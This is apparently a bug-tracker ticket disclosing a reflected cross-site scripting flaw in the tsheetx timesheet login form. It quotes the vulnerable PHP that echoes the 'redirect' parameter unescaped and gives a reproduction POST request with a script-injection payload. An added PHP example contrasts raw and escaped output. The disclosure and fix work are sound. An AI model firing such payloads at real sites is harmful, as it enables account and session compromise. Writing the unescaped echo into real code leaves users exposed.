Cross-site Scripting (XSS) vulnerability in login form

2019-02-17
  • Miikka Värri

    Miikka Värri - 2019-02-17

    There's a cross-site scripting vulnerability in the login form that allows an attacker to execute arbitrary HTML and JavaScript code via the "redirect" parameter.

    Version: <=1.5.3

    https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40
    https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l54

    $redirect = isset($_REQUEST["redirect"]) ? $_REQUEST["redirect"] : "";
    
    ?>
    
    <html>
    <head>
    <title>Timesheet Login</title>
    <?php
    include ("header.inc");
    ?>
    </head>
    <body onLoad="document.loginForm.username.focus();">
    
    <form action="login.php" method="POST" name="loginForm" style="margin: 0px;">
    <input type="hidden" name="redirect" value="<?php echo $redirect; ?>" />
    
     
  • Miikka Värri

    Miikka Värri - 2019-02-17

    To reproduce:

    POST /login.php HTTP/1.1
    Host: localhost
    Content-Length: 108
    Cache-Control: max-age=0
    Origin: http://localhost
    Upgrade-Insecure-Requests: 1
    DNT: 1
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Referer: http://localhost/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fi;q=0.7
    Connection: close
    
    redirect="/><script>alert("XSS")</script><input style="display:none&username=some&password=some&Login=submit
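
As an added example (not part of the ticket and not tsheetx code), the PHP below renders the hidden `redirect` field the way the quoted login.php line does and then with attribute-context escaping, using the value from the reproduction request. The function names are hypothetical.

```php
<?php
// Added example, not tsheetx code. Function names are hypothetical.

// Mirrors the quoted login.php line: the raw request value is written
// straight into a double-quoted HTML attribute.
function hidden_redirect_vulnerable($redirect): string
{
    return '<input type="hidden" name="redirect" value="' . $redirect . '" />';
}

// Same field, with the value escaped for an HTML attribute context.
function hidden_redirect_escaped($redirect): string
{
    // A request with redirect[]=x delivers an array; treat any non-string as empty
    // so htmlspecialchars() never receives a type it rejects.
    if (!is_string($redirect)) {
        $redirect = '';
    }
    // ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
    // ENT_SUBSTITUTE replaces invalid UTF-8 rather than returning an empty string.
    $safe = htmlspecialchars($redirect, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="redirect" value="' . $safe . '" />';
}

// The redirect value from the reproduction request above, after form decoding.
$payload = '"/><script>alert("XSS")</script><input style="display:none';

// Raw output: the leading quote ends the value attribute and the markup that follows is parsed.
echo hidden_redirect_vulnerable($payload), "\n";

// Escaped output: quotes and angle brackets become entities and stay inside value="...".
echo hidden_redirect_escaped($payload), "\n";

// Array input is reduced to an empty value instead of raising an error.
echo hidden_redirect_escaped(['x']), "\n";
```

Comparing the first two output lines shows the difference: only the raw version contains a literal `<script>` element outside the attribute.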
    
     